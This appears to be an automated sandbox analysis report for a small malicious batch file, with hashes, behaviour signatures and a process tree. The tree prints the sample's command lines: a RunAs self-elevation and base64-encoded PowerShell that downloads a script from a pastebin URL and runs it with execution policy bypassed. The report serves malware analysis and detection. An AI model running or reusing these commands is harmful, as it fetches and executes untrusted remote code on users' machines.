Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
08-12-2024 12:59
Static task
static1
Behavioral task
behavioral1
Sample
LHVWN_virus_src.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
LHVWN_virus_src.bat
Resource
win10v2004-20241007-en
General
-
Target
LHVWN_virus_src.bat
-
Size
680B
-
MD5
28a24f08a62dc5c8af6be5e921d4c5ad
-
SHA1
97f70c14a8e2ba4da9d8f5d65961d7d998ebb637
-
SHA256
c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559
-
SHA512
e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577
Malware Config
Signatures
-
pid Process 936 powershell.exe 2772 powershell.exe 2756 powershell.exe 2656 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 936 powershell.exe 936 powershell.exe 936 powershell.exe 2772 powershell.exe 2756 powershell.exe 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 272 wrote to memory of 936 272 cmd.exe 32 PID 272 wrote to memory of 936 272 cmd.exe 32 PID 272 wrote to memory of 936 272 cmd.exe 32 PID 936 wrote to memory of 2104 936 powershell.exe 33 PID 936 wrote to memory of 2104 936 powershell.exe 33 PID 936 wrote to memory of 2104 936 powershell.exe 33 PID 2104 wrote to memory of 2772 2104 cmd.exe 35 PID 2104 wrote to memory of 2772 2104 cmd.exe 35 PID 2104 wrote to memory of 2772 2104 cmd.exe 35 PID 2104 wrote to memory of 2756 2104 cmd.exe 36 PID 2104 wrote to memory of 2756 2104 cmd.exe 36 PID 2104 wrote to memory of 2756 2104 cmd.exe 36 PID 2756 wrote to memory of 2656 2756 powershell.exe 37 PID 2756 wrote to memory of 2656 2756 powershell.exe 37 PID 2756 wrote to memory of 2656 2756 powershell.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD564216b493124fdf095225c6e9540f217
SHA1d7ddd7665e52ba52dcfafd4d98607b81a4bdb2f0
SHA2562790c9b24dd563cd8009a9feacd6856e68de4963564b93012b396e8ac3a97916
SHA512ffa5c4f3b8594932c093113f58eb8f78501d05a028113cfb63b2a0e8d6821d1255d833dbd6ba5e15a3bc0d35be6c899d8adf02d11d2ffe9985a9616190e1d5b6